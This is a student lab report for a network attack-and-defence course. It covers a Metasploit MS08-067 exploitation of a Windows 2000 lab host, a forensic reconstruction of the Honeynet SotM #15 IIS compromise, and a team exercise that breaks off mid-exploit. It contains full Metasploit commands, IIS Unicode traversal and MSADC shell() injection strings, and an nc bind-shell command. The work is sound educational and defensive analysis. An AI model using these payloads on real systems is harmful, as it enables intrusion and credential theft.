20253909 2025-2026-2 《网络攻防实践》实践六报告

20253909 2025-2026-2 《网络攻防实践》第6次作业

本文记录了网络攻防课程第六次作业的完整实验过程。本次作业由三个互为补充的任务构成：第一部分使用 Metasploit 对 Windows 2000 蜜罐靶机进行 MS08-067 漏洞远程渗透攻击，成功拿到目标主机的 Shell；第二部分对 Honeynet Project Scan of the Month #15 中 rfp 部署的真实蜜罐主机 lab.wiretrip.net (172.16.1.106) 被攻陷的全过程进行了取证分析；第三部分是团队对抗实践，由攻方使用 Metasploit 选择 MS08-067 漏洞攻击拿下目标主机控制权，防守方使用 Wireshark 监听并分析整个攻击过程。

一、实践内容

这次实验由三个互为补充的任务构成：第一个是站在攻击方的角度，亲手用 Metasploit 把一台 Windows 2000 打下来；第二个是站在防御/取证方的角度，去翻一份真实蜜罐被入侵后留下来的网络抓包，把整个攻击链条还原出来；第三个则是在与同学组成的攻防小队里完成一次完整的攻防对抗——攻方拿 msf 打靶、守方用 Wireshark 抓包还原。

任务一（动手实践 Metasploit Windows Attacker）：在 Kali Linux 攻击机上启动 Metasploit Framework，对 Windows 2000 Server 蜜罐靶机上的 MS08-067 漏洞（Microsoft Server Service 的 NetAPI 远程代码执行漏洞，CVE-2008-4250）发起远程渗透，最终在攻击机上获得对靶机的完整命令行控制权。这是早期 Windows 平台一个非常经典、危害极大的远程预身份验证 RCE 漏洞，无需任何用户交互，只要 SMB（445/139）暴露在网络上就可以被一键拿下。

任务二（取证分析实践：解码一次成功的 NT 系统破解攻击）：题目背景是来自 IP 地址 212.116.251.162 的攻击者（实际抓包里看到的是 213.116.251.162，注：题目原文为 212，实际抓包为 213，下文以抓包内容为准）成功攻陷了一台由 rfp 部署的蜜罐主机 172.16.1.106 (主机名 lab.wiretrip.net)，要求从给定的 snort 抓包文件中提取并分析整个攻击过程，回答以下五个问题：

攻击者使用了什么破解工具进行攻击？

攻击者如何使用这个破解工具进入并控制了系统？

攻击者获得系统访问权限后做了什么？

我们如何防止这样的攻击？

你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

任务三（团队对抗实践：Windows 系统远程渗透攻击与分析）：与同学组队进行真刀真枪的攻防对抗。攻方使用 Metasploit 选择漏洞对队友提供的 Windows 2000 靶机发起渗透攻击，拿到 shell 后留下身份证明文件；防守方在靶机上同时开启 Wireshark 监听，捕获整个攻击过程并通过 Follow TCP Stream 等手段还原攻击链路、提取关键证据（攻击源 IP、目标端口、所用漏洞、所执行命令等）。

实验网络拓扑环境如下表所示：

主机角色	主机名	IP 地址	操作系统	用途
攻击机	Kali Linux	192.168.200.11	Kali Rolling	任务一/二 Metasploit 渗透
攻击机	WinXPattacker	192.168.200.4	Windows XP SP3	备用
攻击机	SEEDUbuntu9	192.168.200.5	Ubuntu 9.04	备用
靶机	Win2kServer_SP0_target	192.168.200.6	Windows 2000 SP0 中文繁体	任务一 MS08-067 目标
靶机	Metasploitable_ubuntu	192.168.200.130	Ubuntu 8.04	备用
蜜网网关	Honeywall	192.168.200.8	roo-1.4	流量监控
任务三攻击机	Kali Linux（桥接模式）	192.168.43.131	Kali Rolling	团队对抗攻方
任务三靶机	Win2kServer_SP0_target（桥接模式）	192.168.43.3	Windows 2000 SP0 中文繁体	团队对抗守方

二、实践过程

第一部分：Metasploit Windows 远程渗透实践（MS08-067）

漏洞背景

MS08-067 是微软在 2008 年 10 月 23 日紧急发布的带外补丁修复的一个 0day 漏洞，CVE 编号 CVE-2008-4250。漏洞位于 Server 服务（svchost.exe 进程内的 srvsvc.dll）处理 NetPathCanonicalize() 函数时的栈溢出，攻击者只需向受害主机的 SMB 端口（445 或 139）发送一个特制的 RPC 请求，就能在 SYSTEM 权限下执行任意代码——不需要任何凭证、不需要任何用户交互。受影响的系统覆盖 Windows 2000 SP4、XP SP1/SP2/SP3、Server 2003 SP1/SP2 等几乎所有当时还在使用的 Windows 版本，是 Conficker 蠕虫赖以传播的核心武器之一。

Metasploit 中对应的模块是 exploit/windows/smb/ms08_067_netapi，rank 为 great，自带 80 多种 target 适配（区分操作系统版本+语言+ServicePack+NX 状态），支持自动指纹识别。

实验操作

步骤 1：启动 Metasploit Framework

先在 Kali 上把 PostgreSQL 数据库拉起来（msf 用它存模块索引和工作区），然后初始化 msfdb，最后开 msfconsole：

sudo su
service postgresql start
msfdb init
msfconsole

图1：启动 Metasploit Framework v6.4.116-dev，加载 2,623 个 exploit / 1,326 个 auxiliary / 1,707 个 payload

启动信息里能看到当前版本是 v6.4.116-dev，模块数量也很可观——光 exploit 就有 2623 个，几乎涵盖了所有公开的可用漏洞。

步骤 2：搜索 MS08-067 漏洞模块

输入 search ms08_067 让 msf 在它的模块库里检索：

图2：在 msf 控制台输入 search ms08_067 命令

搜索结果非常清晰，匹配到唯一一个模块 exploit/windows/smb/ms08_067_netapi，披露日期 2008-10-28，rank 是 great，并且 Check 列为 Yes——意味着这个模块支持先用 check 命令探测目标是否真的存在漏洞，不必盲打。下面还列出了一长串支持的 target，从 0 号 Automatic Targeting 开始，2 号就是 Windows 2000 Universal——这也是这次实验最关键的一行，因为我的靶机就是 Windows 2000：

图3：search 结果：模块名、披露日期、Rank、以及 80+ 个 target 列表（重点是 target 2 - Windows 2000 Universal）

用 use exploit/windows/smb/ms08_067_netapi 选定该模块，进入模块上下文：

图4：执行 use exploit/windows/smb/ms08_067_netapi 命令选定该模块

步骤 3：查看模块选项与 payload

进入模块上下文后用 show options 看一下要配什么参数。默认 payload 已经被自动设成了 windows/meterpreter/reverse_tcp，需要填的核心选项就是：RHOSTS（目标 IP）、RPORT（默认 445）、SMBPIPE、LHOST（攻击机回连地址）、LPORT（默认 4444）：

图5：show options 显示 RHOSTS / RPORT / LHOST / LPORT 等待填配置项

再用 show payloads 看看支持哪些 payload。msf 给这个 SMB 漏洞匹配出来的 payload 列表特别长——从最简单的 generic/shell_reverse_tcp 到功能强大的 windows/meterpreter/reverse_tcp、windows/x64/meterpreter/reverse_tcp 应有尽有，甚至还有 Android 和 iOS 平台的兼容 payload（虽然在 Win2k 上用不上）：

图6：show payloads 命令列出当前模块支持的所有 payload

步骤 4：配置攻击参数并发起攻击

接下来把这次攻击需要的参数全部填上。RPORT 保持默认的 445（Windows 2000 的 SMB over TCP 监听端口），payload 选用功能更强的 windows/meterpreter/reverse_tcp，LHOST 写攻击机 Kali 的 IP 192.168.200.11，LPORT 默认 4444，RHOSTS 写靶机 IP 192.168.200.6：

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.200.11
set LPORT 4444
set RHOSTS 192.168.200.6

步骤 5：执行 exploit——成功拿到 Shell

参数齐了，exploit 跑下去（或等价的 run），这次的输出读起来就像 hacking 电影：

[*] Started reverse TCP handler on 192.168.200.11:4444
[*] 192.168.200.6:445 - Automatically detecting the target...
[*] 192.168.200.6:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Chinese - Traditional
[*] 192.168.200.6:445 - Selected Target: Windows 2000 Universal
[*] 192.168.200.6:445 - Attempting to trigger the vulnerability...
[*] Command shell session 2 opened (192.168.200.11:4444 -> 192.168.200.6:1035) at 2026-04-26 07:40:45 -0400

图7：MS08-067 攻击成功，Command shell session 2 opened，目标系统被准确指纹为 Windows 2000 中文繁体，攻击通道走的是默认的 445/TCP

特别值得一提的是 msf 那个自动指纹识别——它通过 SMB 协商阶段的细微差异，准确推断出靶机是 "Windows 2000 - Service Pack 0 - 4 - lang:Chinese - Traditional"，然后自己挑了 Windows 2000 Universal 这个 target 去打，整个过程不需要我手动指定 target ID。

Session 一开，下面那个 dir 命令执行后立刻返回了 C:\WINNT\system32 的目录列表，可以看到一堆 Windows 2000 标志性的文件——access.cpl、acctres.dll、accwiz.exe 等等，时间戳是 2000-01-10，说明这是台原版的 Win2k 镜像。

步骤 6：在 Shell 中验证身份

在反弹 shell 里执行 ipconfig 进一步确认我现在确实是在靶机里跑命令：

图8：在反弹 shell 里跑 ipconfig，确认已经在 Win2k 靶机（192.168.200.6）的 system32 目录下执行命令

步骤 7：用 Wireshark 抓包验证反弹连接

开 Wireshark 监听 any 接口，可以清晰看到 Kali 192.168.200.11 与 Win2k 192.168.200.6 之间在 4444↔1044 端口对上的反弹 shell 流量——一片绿油油的 TCP PSH/ACK，里面跑的就是攻击者下发命令、靶机回执结果的完整双向交互：

图9：Wireshark 抓到 192.168.200.11:4444 ↔ 192.168.200.6:1044 的双向 TCP 流，正是反弹 shell 的命令通道

第一部分小结

步骤	操作	结果
启动 msf	service postgresql start; msfdb init; msfconsole	进入 msf 控制台
搜索模块	search ms08_067	找到 exploit/windows/smb/ms08_067_netapi
选定模块	use exploit/windows/smb/ms08_067_netapi	进入模块上下文
查看选项	show options / show payloads	确定 RHOSTS/RPORT/LHOST/LPORT 与 payload
配置参数	set payload meterpreter/reverse_tcp、LHOST=.11、RHOSTS=.6、RPORT=445	参数 OK
发起攻击	exploit	session 2 opened，shell 拿到
验证	dir / ipconfig	在 C:\WINNT\system32 拿到完整控制权

第二部分：取证分析——解码一次成功的 NT 系统破解攻击

案例背景

这个案例来自 The Honeynet Project 的著名挑战赛 "Scan of the Month #15"（2001 年）：知名渗透研究员 rfp（rain forest puppy） 部署了一台名叫 lab.wiretrip.net 的蜜罐（IP 172.16.1.106），运行 Microsoft Windows NT 4.0 / IIS 4.0，故意把一些早期 IIS 的经典漏洞暴露在公网上。2001 年 2 月 4 日，蜜罐被来自 213.116.251.162 的攻击者成功攻陷，整个攻击过程被 snort 完整抓了下来，pcap 文件名 snort-0204@0117.log，这次实验的任务就是从这份 pcap 里把整个事件还原出来。

实验材料如下，pcap 大小 1,650 KB，数据时间戳为 2001/4/14：

图10：实验材料 demo_NT_attack_data.zip 与抓包文件 snort-0204@0117.log（2001 年的真实流量）

步骤 1：用 Wireshark 打开 pcap

直接双击 snort-0204@0117.log 让 Wireshark 加载——一共 6,707 个数据包，时间跨度从 0s 到约 2 万秒（约 5.5 小时），通讯方涉及上百个外部 IP，是一次相当"热闹"的蜜罐捕获：

图11：Wireshark 加载 snort-0204@0117.log，共 6,707 个包

步骤 2：先看 IPv4 统计找出主要攻击方

Statistics → IPv4 Statistics → All Addresses，按 Count 排序就能一眼看出谁是主角。结果非常清楚：

图12：IPv4 Statistics——172.16.1.106（蜜罐自己）6,637 包占 98.96%，213.116.251.162（主要攻击者）4,845 包占 72.24%；另一个引人注意的 IP 是 202.85.60.156（344 包，5.13%）

蜜罐 172.16.1.106 出现在 98.96% 的包里很正常（每条会话蜜罐都参与）；外部 IP 中 213.116.251.162 以 4,845 个包占 72.24% 遥遥领先，这就是题目里说的主要攻击者。次高的 202.85.60.156 占了 5.13%——后面会发现这其实是另一个独立的入侵者。

步骤 3：还原攻击者侦察阶段

用过滤器 ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http 看看双方的 HTTP 交互。攻击者的第一步动作是把 lab.wiretrip.net 网站浏览了一遍，依次 GET 了 /、/rfpback.gif、/rfp.gif、/lrfptop.gif、/lrfpbot.gif、/void.gif、/technotronic.gif、/whisker.gif 等一堆图片——这些都是 rfp 自己网站上的图片资源，攻击者就像普通访客一样把页面看了一遍，然后才开始动手：

图13：攻击者先把 lab.wiretrip.net 主页浏览了一遍——HTML 里能看到指向 technotronic.com、wiretrip.net/rfp/、securityfocus.com、ntsecurity.net、nmrc.org 的链接

步骤 4：第一发攻击——IIS Unicode 路径穿越

紧接着攻击者尝试了 IIS 历史上最经典的漏洞之一——Unicode 路径穿越（CVE-2000-0884），请求是：

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

图14：Unicode bug 利用——用 %C0%AF 这种"过长 UTF-8"编码（实际表示 / 字符）绕过 IIS 路径校验，跨目录读取 C:\boot.ini

%C0%AF 是斜杠 / 的"过长 UTF-8 编码"——按 UTF-8 规范这种冗余编码本应被拒绝，但 IIS 4.0 的解码器有个 bug：它先做 URL 安全校验（防 ../）再做 UTF-8 解码，结果攻击者用 %C0%AF 替换 /，过了第一道关卡再被 UTF-8 解码还原成 /，从而成功跨目录访问任意文件。这一发就是侦察——读 C:\boot.ini，确认这个 bug 在这台机器上是真有效的。

步骤 5：MSADC RDS 漏洞侦察 + 利用——核心攻击入口

Unicode 走通之后攻击者切换到了威力更大的武器——MSADC RDS 远程命令执行漏洞（MS99-025），正是 rfp 自己挖的、自己写的 exploit msadc.pl！攻击者先做了一次轻量级探测：

GET /msadc/msadcs.dll HTTP/1.0
→ HTTP/1.1 200 OK

图15：MSADC 组件存在性探测——GET /msadc/msadcs.dll 返回 200 OK，确认 IIS 上的 MSADC 服务可用

200 OK 意味着 MSADC（Microsoft Access Data Connector）组件在 IIS 上是开启的——这就是攻击突破口。然后攻击者连续发送了多个 POST 请求，全部针对 /msadc/msadcs.dll/AdvancedDataFactory.Query：

图16：用过滤器 http.request.uri contains "msadc" 筛出所有 MSADC 相关请求——共数十次 POST /msadc/msadcs.dll/AdvancedDataFactory.Query 调用

追踪其中一个 POST 的完整 TCP 流，能看到这次攻击的"指纹"：

图17：MSADC RDS 漏洞利用包——User-Agent: ACTIVEDATA, Host: lab.wiretrip.net, multipart 边界字符串 !ADM!ROX!YOUR!WORLD!（这是 rfp 的 msadc.pl 工具的标志性签名！），嵌入的 SQL 语句 Select * from Customers where City='|shell("cmd /c ...")|' 通过 Jet OLE DB 的 shell() 函数执行任意 cmd 命令

这就是答案了——攻击工具就是 rfp 自己写的 msadc.pl。它的特征非常明显：

User-Agent: ACTIVEDATA（msadc.pl 写死的）

multipart 边界: !ADM!ROX!YOUR!WORLD!（rfp 与 ADM 黑客组织的招牌口号）

payload 结构: 利用 Jet OLE DB 的 shell() 函数 + 默认安装的 btcustmr.mdb 数据库做命令注入

SQL 注入串: Select * from Customers where City='|shell("cmd /c ...")|'.driver={Microsoft Access Driver (*.mdb).};.dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

这个攻击的妙处在于：MSADC 服务运行在 IIS 进程上下文（IUSR 或 IWAM），它把 Customers 这个表的查询请求转给 Microsoft Access 的 OLE DB 驱动，而 Jet 驱动支持一个非标准的扩展函数 shell()，能直接调用 cmd /c——于是攻击者通过一个看起来人畜无害的 SQL 查询，把任意命令执行下去。

攻击者用这个原语连续打了好多发命令。比如下面这一发是在写 ftpcom 脚本（为后面的 FTP 自动化做准备）：

图18：MSADC 注入——执行 echo user johna2k >> ftpcom，逐行构造 FTP 登录脚本

另一发是直接执行密码 dump 工具 pdump.exe，输出重定向到 c:\yay.txt：

图19：MSADC 注入——执行 pdump.exe >> c:\yay.txt，尝试 dump 系统密码哈希

步骤 6：建立持久后门——Unicode + nc 反向监听

光靠 MSADC 一发一发执行命令太麻烦了，攻击者干脆把 Unicode bug 和 netcat 结合起来，建了一个 port 6969 的后门 shell：

图20：组合拳——GET /msadc/..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1。用 Unicode bug 跨目录调起 cmd1.exe（cmd.exe 的副本），让它启动 nc 在 6969 端口监听并把进入的连接绑到 cmd1.exe 上——一个标准的 bind shell 就此挂起

过滤 tcp.port == 6969 能看到后门建立后攻击者大量的命令交互，整整 1879 个包都跑在这个端口上：

图21：tcp.port == 6969 过滤——后门建立后攻击者持续通过 6969 下发命令、收回执行结果，共 1,879 个数据包

步骤 7：FTP 拉黑客工具包——nc.exe / pdump.exe / samdump.dll

接下来攻击者要把自己的"工具箱"拉到蜜罐上。第一次尝试连了一个 SunOS 的 FTP freenet.nether.net（204.42.253.18）但密码错了：

图22：第一次 FTP 失败——freenet.nether.net 用 USER johna2k / PASS hacker2000 登录返回 530 Login incorrect

失败之后换了一台 Windows 上的 Serv-U FTP 服务器（IP 仍然是 213.116.251.162——也就是攻击者自己的机器，开了对外 FTP 服务），banner 极其有黑客文化的味道：

220 ------- H-A-C-K  T-H-E  P-L-A-N-E-T -------
220-W3l_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

用账号 johna2k/haxedj00 登录成功，依次下载了三个文件：

nc.exe（59,392 字节）—— Netcat，瑞士军刀

pdump.exe（32,768 字节）—— 密码 hash dump 工具

samdump.dll（36,864 字节）—— SAM 数据库 dump 库

图23：第二次 FTP 成功——Serv-U "H-A-C-K T-H-E P-L-A-N-E-T" 服务器，账号 johna2k / 密码 haxedj00，连续 RETR 下载 nc.exe、pdump.exe、samdump.dll 三个攻击工具

退出时服务器还说了句很嚣张的话：

图24：QUIT 后服务器响应 "221 Buh bye, you secksi hax0r j00 :]"——典型的 2001 年地下圈子用语

下载完之后在蜜罐里 dir 一下确认这三个工具全部到位：

图25：蜜罐 C:\Program Files\Common Files\system\msadc 目录下出现 nc.exe、pdump.exe、samdump.dll 三个新文件

步骤 8：用户/组枚举与提权尝试

有了 shell 和工具之后攻击者开始系统侦察。先 net user 看看本机账户：

图26：net user 枚举本地账户——Administrator、Guest、IUSR_KENNY（IIS 匿名账户）、IWAM_KENNY（IIS 进程账户）

主机名能从账户后缀推出来——KENNY 就是这台机器的 NetBIOS 名字。然后攻击者尝试添加一个后门用户 himan，密码 HarHar666：

net user himan HarHar666 /ADD
→ System error 1312 has occurred.
   A specified logon session does not exist. It may already have been terminated.

图27：net user himan HarHar666 /ADD 失败——错误码 1312（登录会话不存在），因为攻击者跑在 IIS 的 IUSR_KENNY 上下文里，权限不够

这个失败说明攻击者还没拿到 SYSTEM——他还停留在 IIS 进程的低权限上下文里。但 net localgroup administrators 这个只读查询是成功的，列出了管理员组成员：

图28：net localgroup administrators 成功——管理员组成员是 Administrator 和 Domain Admins

步骤 9：尝试 dump 密码（SAM）——失败

接下来攻击者尝试 dump SAM 文件（windows 密码数据库）。先找了个 SAM 备份位置 C:\WINNT\repair\sam._：

图29：type sam._ 被 Access denied；目录列表显示了 sam._、security._、software._、ntuser.da_ 等 NT 注册表配置单元的备份文件

接着试 pdump.exe 直接从 LSASS 进程内存里扒：

pdump
→ Failed to open lsass: 5. Exiting.

图30：pdump 也失败——错误 5（Access Denied），LSASS 进程的 SE_DEBUG 权限不可获得，IIS 上下文打不开 lsass.exe

两种 dump 方式都失败，说明 IUSR_KENNY 这个 IIS 匿名账户的权限确实有限——这其实正是 rfp 故意把蜜罐的服务/账户配成弱权限的"拒止配置"，让攻击者过得不那么爽。

步骤 10：清理痕迹——把工具删了

攻击者发现搞不到管理员之后，干了一件很值得玩味的事——主动清理痕迹：

del samdump.dll
del pdump.exe
del ftpcom
del heh.txt

图31：del samdump.dll、del pdump.exe——攻击者主动清理上传的工具，试图擦除自己来过的痕迹

步骤 11：致命的留言——攻击者识破了蜜罐

清理完之后，攻击者干了一件非常关键的事——他给 rfp 留了一封信：

echo Hi, i know that this a ..is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

图32：echo Hi, i know that this a ..is a lab server, but patch the holes! :-) >>README.NOW.Hax0r ——攻击者直白地告诉 rfp："我知道这是一台实验服务器，但你也把洞补上吧！"

这就是任务问题 5 的答案——是的，攻击者警觉了。他在留言里明确写道 "i know that this a ..is a lab server"。

不仅 213.116.251.162 这一位识破了，第二位攻击者 202.85.60.156 也来过，并且也意识到这是个蜜罐，也留了张更直白的字条：

echo best honeypot i've seen till now :) > rfp.txt

图33：第二位攻击者 202.85.60.156 留言 "best honeypot i've seen till now :)"——直接把 honeypot 字眼写出来，并且文件名直接叫 rfp.txt

取证回答

基于上面的全过程证据，对题目五个问题逐条给出明确答案：

Q1. 攻击者使用了什么破解工具进行攻击？

主要工具：rfp 自己写的 msadc.pl（MSADC RDS 漏洞利用脚本）。识别证据有三：

HTTP User-Agent 写死为 ACTIVEDATA

POST body 的 multipart 边界字符串是 !ADM!ROX!YOUR!WORLD!——这是 rfp 与 ADM 黑客组织的标志性口号

payload 结构是经典的 Jet OLE DB shell() 函数 + btcustmr.mdb 命令注入

辅助工具：

IIS Unicode 路径穿越漏洞利用（手工构造 %C0%AF URL）—— 用于直接执行 cmd

netcat (nc.exe) —— 监听 6969 端口建后门

pdump.exe —— 尝试 dump LSASS 密码（失败）

samdump.dll —— SAM 数据库 dump 库（未成功调用）

Q2. 攻击者如何使用这个破解工具进入并控制了系统？

攻击链由三阶段组成：

阶段一：侦察。 用浏览器把 lab.wiretrip.net 主页过了一遍；测 IIS Unicode bug GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini 读 C:\boot.ini 验证漏洞存在；测 MSADC GET /msadc/msadcs.dll 返回 200 OK 确认 RDS 组件可用。

阶段二：命令执行。 用 msadc.pl 通过 POST /msadc/msadcs.dll/AdvancedDataFactory.Query 嵌入 Select ... | shell("cmd /c ...")| 注入命令，依次完成：① 写 ftpcom 脚本 ② 跑 pdump.exe ③ 通过 Unicode bug cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe 在 6969 端口启动 netcat 监听后门。

阶段三：持久化与控制。 通过 6969 端口的 nc 后门远程交互式执行命令；用 FTP 从攻击者自己的 Serv-U 服务器（账号 johna2k / 密码 haxedj00）下载 nc.exe、pdump.exe、samdump.dll 三个工具到蜜罐上。

Q3. 攻击者获得系统访问权限后做了什么？

系统侦察：net user（列账户：Administrator/Guest/IUSR_KENNY/IWAM_KENNY）、net group、net localgroup administrators（列出管理员组成员）、net start（列服务）、目录遍历到 C:\、Program Files、WINNT 等

试图加后门用户：net user himan HarHar666 /ADD —— 失败（错误 1312，权限不够）

试图 dump 密码：type C:\WINNT\repair\sam._ —— Access denied；pdump.exe 直接 dump LSASS —— Failed to open lsass: 5

清理痕迹：del samdump.dll、del pdump.exe、del ftpcom、del heh.txt

留言：写了 README.NOW.Hax0r 提醒 rfp"我知道这是 lab server，但还是把洞补上吧"

Q4. 我们如何防止这样的攻击？

MSADC RDS 漏洞：禁用或删除 /msadc/msadcs.dll，安装 MS99-025 补丁；不需要 RDS 的 IIS 服务器不应安装该组件。

IIS Unicode 路径穿越：安装 MS00-078 补丁；升级到 IIS 5.0/6.0 之后版本已修复。

网络层面：边界防火墙严格限制入站端口（仅允许 80/443，禁止外部访问 21、139、445、6969 等异常端口）；部署 IDS/IPS 检测 !ADM!ROX!YOUR!WORLD!、%C0%AF、shell(、btcustmr.mdb 这些已知特征。

主机层面：IIS 进程严格按最小权限原则跑（用专用低权限账户）；移除 IIS 默认安装的示例 mdb 文件（btcustmr.mdb、Northwind 等）；限制 cmd.exe、tftp.exe、ftp.exe 等危险二进制对 IUSR/IWAM 账户的执行权限。

审计层面：开启 IIS 详细日志和进程级审计；对系统目录、注册表 SAM 路径做完整性监控；订阅 Microsoft Security Bulletin 及时打补丁。

Q5. 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

是，攻击者警觉了。证据非常直接：

213.116.251.162 留言："Hi, i know that this a ..is a lab server, but patch the holes! 😃" 写到了 README.NOW.Hax0r 文件里——明确说出 "lab server"。

202.85.60.156 留言："best honeypot i've seen till now 😃" 写到了 rfp.txt 文件里——直接说出 "honeypot" 这个词，文件名甚至是 rfp.txt，表明这位攻击者甚至能识别出蜜罐的部署者就是 rfp 本人。

为什么会被识破，我推测有几个原因：

域名 lab.wiretrip.net 太显眼——wiretrip.net 就是 rfp 公开的研究域名，业内人士一看就知道这台机器跟 rfp 有关，而 rfp 是著名的蜜罐研究者。

网站内容里直接放了 rfp.gif、whisker.gif（rfp 写的扫描器）等图片——也就是图13 看到的，蜜罐的"伪装"做得太露骨。

服务/数据反常——比如 C:\ 根目录下有名为 exploits 的文件夹、yay.txt、wiretrip 这种很"不像生产环境"的目录，会让有经验的攻击者立刻起疑。

攻击者本身是社区资深成员——能用 msadc.pl 这个高级工具的人多半也认识 rfp，看到 wiretrip 域名几乎是条件反射。

但即便识破了，攻击者还是把全套攻击流程跑完了——这反映出一种很有趣的心态："我知道这是局，但我还是要演给你看"。可能是给 rfp 一个面子（你写的工具我用过了），也可能是借机展示技术，甚至可能是好奇蜜罐能不能被反制。

第二部分小结

阶段	攻击者动作	结果
0 侦察	浏览主页、测 Unicode bug 读 boot.ini	确认 IIS Unicode 漏洞
1 侦察	GET /msadc/msadcs.dll	200 OK，确认 MSADC 可用
2 利用	msadc.pl + Jet OLE DB shell() 命令注入	在 IUSR 下任意执行 cmd
3 持久	Unicode 调起 cmd1.exe + nc -l -p 6969	6969 端口 bind shell
4 工具	FTP from Serv-U(johna2k/haxedj00)	下载 nc/pdump/samdump
5 提权	net user himan / pdump lsass / type sam._	全部失败（权限不足）
6 痕迹	del samdump.dll, del pdump.exe	主动清理
7 留言	echo "i know this a lab server" >> README.NOW.Hax0r	识破蜜罐
X 第二攻击者	202.85.60.156 echo "best honeypot" > rfp.txt	也识破

第三部分:团队对抗实践——Windows 系统远程渗透攻击与分析

角色分工与对抗背景

这一部分跟前两部分不同——它是真正的"人对人"的攻防。我和同学组队完成本次对抗实验，双方信息如下：

角色	同学姓名	学号	主机	IP 地址	操作系统
攻方	李佳橦（lijiatong）	20253909（本人）	Kali Linux	192.168.43.131	Kali Rolling
守方	董昊鹏donghaopeng	20253904（同学）	Win2kServer_SP0_target	192.168.43.3	Windows 2000 SP0 中文繁体

所选漏洞：与第一部分相同，仍然是 MS08-067（CVE-2008-4250）—— Microsoft Server Service 的 NetAPI 远程代码执行漏洞，端口 445/TCP 上无需任何凭证即可利用。这个漏洞被选中的原因是它对 Windows 2000 命中率极高、不需要交互、且 msf 自带的指纹识别能精确锁定中文繁体版本。

对抗目标：

攻方目标：拿到靶机的 shell，并在 C:\WINNT\system32\ 下创建一个名为 shuaige 的目录，再在该目录里写入一个 Test.txt 文件，内容为 "I am lijiatong 20253909 lijiatong"，作为攻击成功的"印记"。

守方目标：在靶机上启动 Wireshark 监听 eth0（桥接物理网卡），捕获从攻击发起到 shell 建立、再到攻击者下发命令的全过程；通过 Follow TCP Stream 还原命令执行内容，提取攻击源 IP、目标端口、所用漏洞、所执行命令等关键证据。

实验环境准备

步骤 1：把两台虚拟机切到桥接模式

前两部分都是在内置的 vmnet 内网（192.168.200.0/24）里玩，但这次队友的 Win2k 在另一台物理机上，所以必须切成桥接模式让两台虚拟机直接挂到物理局域网上，共用一个 192.168.43.0/24 的网段。

先调 Win2k 靶机的网络适配器：

图34：Win2kServer_SP0_target 网络适配器切到"桥接模式：直接连接物理网络"，并勾选"复制物理网络连接状态"

再调 Kali 攻击机：

图35：Kali Linux 也切到桥接模式，确保两台虚拟机能直接通过物理交换机互通

桥接模式的好处是：物理路由器（这里是手机热点 192.168.43.1）会给两台虚拟机分配同网段的 DHCP IP，它们就像两台真实的机器一样直接通信，攻击流量也会经过真实的物理网络——更接近真实攻防环境。

步骤 2：确认两台机器的 IP

在 Kali 上跑 ifconfig：

图36：Kali 攻击机 eth0 拿到 IP 192.168.43.131，掩码 24，广播地址 192.168.43.255，MAC 00:0c:29:bd:78:73

在 Win2k 靶机上跑 ipconfig：

图37：Win2kServer 拿到 IP 192.168.43.3，子网掩码 255.255.255.0，默认网关 192.168.43.1（物理路由器）

到这里两边的 IP 已经确定：

攻击机 Kali：192.168.43.131

靶机 Win2k：192.168.43.3

步骤 3：双向 ping 验证连通性

开打之前先 ping 一下确认两台机器能互通——这是攻防演练的"预热步骤"。

Win2k 靶机 ping Kali 攻击机：

图38：Win2k → Kali 4 个 ICMP 包全通，0% 丢包，平均延迟 4 ms——两台机器在同一桥接子网里通信良好

Kali 攻击机 ping Win2k 靶机：

图39：Kali → Win2k 4 个 ICMP 包也全通，TTL 128 是 Windows 默认值，与 Linux 默认 TTL 64 形成鲜明对比

两边都通了，可以正式开打。

攻方（本人 lijiatong / 20253909）行动

步骤 4：启动 msfconsole

在 Kali 上 msfconsole 进入 Metasploit 控制台。这次启动的是 v6.4.64-dev 版本（虚拟机里自带的，比第一部分的 v6.4.116-dev 略旧，但已经包含 ms08_067_netapi 模块）：

图40：msfconsole 启动成功，进入 msf6 提示符

步骤 5：use 模块 + show payloads

直接选定 ms08_067_netapi 模块。msf 默认会把 payload 设成 windows/meterpreter/reverse_tcp，但这次为了让 shell 反弹的兼容性更好（Win2k 上 meterpreter 偶尔会有兼容性小问题），我打算改用更"质朴"的 generic/shell_reverse_tcp——直接得到一个原生 cmd shell。

先 show payloads 看看支持哪些：

图41：use exploit/windows/smb/ms08_067_netapi 选定模块，msf 提示默认 payload 是 windows/meterpreter/reverse_tcp；接着 show payloads 列出兼容的 payload

往下翻能看到所有 payload，包括 generic 系列和 windows/shell 系列等：

图42：show payloads 续——可以看到 windows/shell/reverse_tcp、windows/shell/bind_tcp 等更"原生"的 cmd shell 选项

步骤 6：配置参数

按照桥接环境的 IP 配上参数：

set payload generic/shell_reverse_tcp
set LHOST 192.168.43.131
set RHOST 192.168.43.3
show options

图43：配置完成——payload=generic/shell_reverse_tcp，RHOSTS=192.168.43.3（队友的 Win2k），RPORT=445（默认 SMB），LHOST=192.168.43.131（我自己），LPORT=4444（默认）

关键参数确认：

参数	取值	说明
Module	exploit/windows/smb/ms08_067_netapi	MS08-067 RCE 漏洞
Payload	generic/shell_reverse_tcp	原生 cmd 反弹 shell
RHOSTS	192.168.43.3	队友靶机 IP
RPORT	445	SMB over TCP 端口
SMBPIPE	BROWSER	RPC 命名管道
LHOST	192.168.43.131	我自己的 Kali IP
LPORT	4444	反弹连接端口
Target	0 - Automatic Targeting	msf 自动指纹

步骤 7：发起 exploit——成功拿到 shell

执行 exploit，msf 像第一部分一样跑出了它的招牌输出：

[*] Started reverse TCP handler on 192.168.43.131:4444
[*] 192.168.43.3:445 - Automatically detecting the target...
[*] 192.168.43.3:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Chinese - Traditional
